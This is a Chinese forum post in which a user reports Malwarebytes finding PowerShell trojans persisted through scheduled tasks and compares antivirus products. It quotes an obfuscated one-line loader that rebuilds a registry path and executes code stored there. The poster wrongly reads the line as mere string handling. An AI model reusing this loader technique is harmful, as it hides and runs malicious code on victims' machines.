本帖最后由 JAYSIR 于 2023-1-25 17:19 编辑
更新一下,还是打消MB日用的想法,后台占用非常高,进主页一看没有任何扫描任务。
过一会儿又好了,感觉还是当个扫描器吧。
---
不知道是不是前两天下载的WEPE(不小心安装到了系统)有问题(一直是WD),这几天电脑内存总是闲置时被两个ps脚本占用满了内存。观察不到恶意现象,但是又查不到来源。也看不到指令是什么。
今天心血来潮下了MB扫了一下,马上就发现问题了。
MB 不仅扫出了关联启动的几条注册表,连同脚本启动也扫出来了。
- 檔案: 21
- Trojan.PowerShell.Generic, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\WindowsUpdate\Scheduled Startx786kiR, 已隔離, 5221, 1092540, , , , , EB8DFCD6ED37909C689BD4147D2B723A, C0918D6BDD730807243885256C470B691339853FA471388A49DEEC14D1FDED5F
- Trojan.PowerShell.Generic, C:\WINDOWS\SYSTEM32\468E6EE7-EA93-4F25-80F4-62CAA941116B.ps1, 已隔離, 5221, 1092540, 1.0.64948, , ame, , AE2B194FD51DFC313AADA57DCD712021, 82DF4E5A288FC5CEB2D555C549D7AA9B2077FE1A9064F5D2740009B6640570E4
- Trojan.PowerShell, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\SyncCenter\psPuocYg, 已隔離, 877, 1113383, , , , , E2CF5A635AE40ADF62A961700C1B7E92, ED4EB2279FB8BD5CFF54DD67CC46F0B281F6FD7D7AB5B02653C058C1829D004B
- Trojan.PowerShell, C:\WINDOWS\SYSTEM32\31D9.tmp\31DA.tmp.ps1, 已隔離, 877, 1113383, 1.0.64948, , ame, , 927E2BFDA25C45E6096334648DC5BC01, 93B145F610FA90B45655AE4550A4E1C6EA0C949E21125B88E65705C78FD9C2B3
当然误报也挺高的,连同chrome下的几条日志也当成病毒了。
PS脚本为,
- icm ($joctWzsrJyY::Create([string]::Join('', ((gp (([regex]::Matches('RhXBFyssnoitacilppAderetsigeR\ERAWTFOS\:MLKH', '.', 'RightToLeft') | ForEach { $_.value }) -join '')).'AiD2J2OmnW' | % { [char]$_ }))))
对ps不是很熟,没看懂哪里有问题,好像仅仅是在操作字符串导致内存溢出?
注册表看了没什么问题,程序叫科学任务,也可能是什么合法程序创立的。暂时没观测到其他问题,总之可以归类到恶意脚本吧。
使用习惯还是可以的,一直在用WD,从来就没报过毒 。
打算这段时间切换到MB看看体验如何。
|
发表于 2023-1-25 11:38:00
发表于 2023-1-25 11:51:17
楼主
